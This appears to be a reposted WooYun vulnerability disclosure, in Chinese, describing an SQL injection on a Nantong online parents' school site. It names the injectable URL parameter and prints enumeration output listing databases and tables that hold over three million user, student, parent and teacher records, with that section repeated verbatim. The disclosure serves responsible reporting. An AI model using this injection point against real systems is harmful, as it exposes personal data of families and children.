南通市网上家长学校SQL注入大量可垮裤查询(涉及300w用户信息)

admin
admin
admin
139509
文章
114
评论
2017年4月27日07:52:48评论364 views字数 226阅读0分45秒阅读模式
摘要

2016-04-12: 细节已通知厂商并且等待厂商处理中
2016-04-12: 厂商已经确认,细节仅向厂商公开
2016-04-22: 细节向核心白帽子及相关领域专家公开
2016-05-02: 细节向普通白帽子公开
2016-05-12: 细节向实习白帽子公开
2016-05-27: 细节向公众公开

漏洞概要 关注数(13) 关注此漏洞

缺陷编号: WooYun-2016-187971

漏洞标题: 南通市网上家长学校SQL注入大量可垮裤查询(涉及300w用户信息)

相关厂商: ntjxt.com

漏洞作者: 黑色键盘丶

提交时间: 2016-04-12 16:18

公开时间: 2016-05-27 19:10

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 11

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 注射技巧

2人收藏

漏洞详情

披露状态:

2016-04-12: 细节已通知厂商并且等待厂商处理中
2016-04-12: 厂商已经确认,细节仅向厂商公开
2016-04-22: 细节向核心白帽子及相关领域专家公开
2016-05-02: 细节向普通白帽子公开
2016-05-12: 细节向实习白帽子公开
2016-05-27: 细节向公众公开

简要描述:

RT

详细说明:

code 区域 
注入点:http://www.ntjxt.com/areas?area_id=1

数据库

code 区域 
available databases [12]:
 [*] COMMUNITY_ONLINE
 [*] CTXSYS
 [*] ESCHOOL30
 [*] EXFSYS
 [*] GATEWAY
 [*] MDSYS
 [*] OLAPSYS
 [*] PARENTSCHOOL
 [*] SYS
 [*] SYSTEM
 [*] WMSYS
 [*] XUEXI6_PARENTSCHOOL

code 区域 
Database: PARENTSCHOOL
 +-----------------------+---------+
 | Table                 | Entries |
 +-----------------------+---------+
 | SESSIONS              | 11057339 |
 | PAGE_RECORDS          | 8907483 |
 | ACTIVITY_MESSAGES     | 1530992 |
 | BLESSINGS             | 962585  |
 | BOOK_MESSAGES         | 545177  |
 | BOOK_ACTIVITIES       | 333791  |
 | LOTTERY_RECORDS       | 89213   |
 | ACTION_RECORDS        | 85368   |
 | FOCUS                 | 69882   |
 | NEWS_LINES            | 20725   |
 | BOOK_EXCHANGES        | 8830    |
 | BOTTLE_USER_RELATIONS | 8596    |
 | LINSHI                | 8286    |
 | PAPER_RESULTS         | 5733    |
 | AWARD_USER_RELATIONS  | 5581    |
 | BOTTLES               | 4705    |
 | BOOK_ACTIVITY_AWARDS  | 3785    |
 | QUEUE_MESSAGES        | 1083    |
 | QUESTIONS             | 1060    |
 | BOOK_AWARD_USERS      | 887     |
 | RESOURCES             | 655     |
 | SCHOOL_TYPES          | 574     |
 | SCHOOLS               | 512     |
 | AREA_NEWS             | 493     |
 | ARTICLES              | 459     |
 | BOOK_ARTICLES         | 434     |
 | BOOK_SETTINGS         | 168     |
 | LECTURE_COMMENTS      | 134     |
 | ARTICLE_COMMENTS      | 113     |
 | INDEX_SETTINGS        | 86      |
 | ACTIVITY_PICTURES     | 74      |
 | DANGERS               | 68      |
 | LOTTERY_SETTINGS      | 61      |
 | LECTURES              | 52      |
 | ACTIVITY_AWARDS       | 36      |
 | RESOURCE_TYPES        | 27      |
 | BEAUTIES              | 23      |
 | NEWS_TYPES            | 23      |
 | BOOK_LISTINGS         | 16      |
 | PAPER_OPTIONS         | 10      |
 | AREA_MANAGERS         | 9       |
 | SONGS                 | 8       |
 | WAITING_MESSAGE_LOGS  | 6       |
 | PAPER_QUESTIONS       | 3       |
 | NOTICES               | 2       |
 | ACTIVITY_REPORTS      | 1       |
 | PAPERS                | 1       |
 +-----------------------+---------+

可垮裤查询数据库 300多w用户信息

code 区域 
Database: ESCHOOL30
 +-------------------------+---------+
 | Table                   | Entries |
 +-------------------------+---------+
 | GROUP_USER_RELATIONS    | 3276581 |
 | USERS                   | 3252938 |
 | STUDENTS                | 1577602 |
 | PARENTS                 | 1565084 |
 | SEND_SERVICE_RELATIONS  | 333491  |
 | TEACHERS                | 89003   |
 | WAITING_MESSAGES        | 86689   |
 | USER_GROUPS             | 83326   |
 | WAITING_MESSAGE_RECORDS | 7674    |
 | SCHOOL_INFOS            | 934     |
 +-------------------------+---------+

漏洞证明:

code 区域 
注入点:http://www.ntjxt.com/areas?area_id=1

数据库

code 区域 
available databases [12]:
 [*] COMMUNITY_ONLINE
 [*] CTXSYS
 [*] ESCHOOL30
 [*] EXFSYS
 [*] GATEWAY
 [*] MDSYS
 [*] OLAPSYS
 [*] PARENTSCHOOL
 [*] SYS
 [*] SYSTEM
 [*] WMSYS
 [*] XUEXI6_PARENTSCHOOL

code 区域 
Database: PARENTSCHOOL
 +-----------------------+---------+
 | Table                 | Entries |
 +-----------------------+---------+
 | SESSIONS              | 11057339 |
 | PAGE_RECORDS          | 8907483 |
 | ACTIVITY_MESSAGES     | 1530992 |
 | BLESSINGS             | 962585  |
 | BOOK_MESSAGES         | 545177  |
 | BOOK_ACTIVITIES       | 333791  |
 | LOTTERY_RECORDS       | 89213   |
 | ACTION_RECORDS        | 85368   |
 | FOCUS                 | 69882   |
 | NEWS_LINES            | 20725   |
 | BOOK_EXCHANGES        | 8830    |
 | BOTTLE_USER_RELATIONS | 8596    |
 | LINSHI                | 8286    |
 | PAPER_RESULTS         | 5733    |
 | AWARD_USER_RELATIONS  | 5581    |
 | BOTTLES               | 4705    |
 | BOOK_ACTIVITY_AWARDS  | 3785    |
 | QUEUE_MESSAGES        | 1083    |
 | QUESTIONS             | 1060    |
 | BOOK_AWARD_USERS      | 887     |
 | RESOURCES             | 655     |
 | SCHOOL_TYPES          | 574     |
 | SCHOOLS               | 512     |
 | AREA_NEWS             | 493     |
 | ARTICLES              | 459     |
 | BOOK_ARTICLES         | 434     |
 | BOOK_SETTINGS         | 168     |
 | LECTURE_COMMENTS      | 134     |
 | ARTICLE_COMMENTS      | 113     |
 | INDEX_SETTINGS        | 86      |
 | ACTIVITY_PICTURES     | 74      |
 | DANGERS               | 68      |
 | LOTTERY_SETTINGS      | 61      |
 | LECTURES              | 52      |
 | ACTIVITY_AWARDS       | 36      |
 | RESOURCE_TYPES        | 27      |
 | BEAUTIES              | 23      |
 | NEWS_TYPES            | 23      |
 | BOOK_LISTINGS         | 16      |
 | PAPER_OPTIONS         | 10      |
 | AREA_MANAGERS         | 9       |
 | SONGS                 | 8       |
 | WAITING_MESSAGE_LOGS  | 6       |
 | PAPER_QUESTIONS       | 3       |
 | NOTICES               | 2       |
 | ACTIVITY_REPORTS      | 1       |
 | PAPERS                | 1       |
 +-----------------------+---------+

可垮裤查询数据库 300多w用户信息

code 区域 
Database: ESCHOOL30
 +-------------------------+---------+
 | Table                   | Entries |
 +-------------------------+---------+
 | GROUP_USER_RELATIONS    | 3276581 |
 | USERS                   | 3252938 |
 | STUDENTS                | 1577602 |
 | PARENTS                 | 1565084 |
 | SEND_SERVICE_RELATIONS  | 333491  |
 | TEACHERS                | 89003   |
 | WAITING_MESSAGES        | 86689   |
 | USER_GROUPS             | 83326   |
 | WAITING_MESSAGE_RECORDS | 7674    |
 | SCHOOL_INFOS            | 934     |
 +-------------------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-04-12 19:05

厂商回复:

部分信息由于2011年就不维护了,确实有漏洞

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin